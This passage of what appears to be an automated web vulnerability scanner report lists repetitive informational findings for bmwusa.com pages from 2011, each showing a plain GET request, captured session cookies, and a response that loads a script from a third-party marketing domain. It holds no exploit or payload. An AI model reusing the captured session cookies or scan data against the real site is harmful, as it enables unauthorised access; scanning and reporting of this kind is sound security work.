Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:40:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:00:40 GMT;path=/
Content-Length: 202153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.115. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/528isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:51 GMT;path=/
Content-Length: 213820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.116. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/528isedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:15 GMT;path=/
Content-Length: 213821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.117. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:31 GMT;path=/
Content-Length: 227489


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.118. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:07 GMT;path=/
Content-Length: 227490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.119. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:54 GMT;path=/
Content-Length: 214968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.120. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:39 GMT;path=/
Content-Length: 202084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.121. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535igt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:01 GMT;path=/
Content-Length: 214817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.122. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:01 GMT;path=/
Content-Length: 227586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.123. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:54:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:14:39 GMT;path=/
Content-Length: 227587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.124. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:30 GMT;path=/
Content-Length: 213527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.125. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:12 GMT;path=/
Content-Length: 213528


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.126. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:11 GMT;path=/
Content-Length: 202023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.127. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:33 GMT;path=/
Content-Length: 214435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.128. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
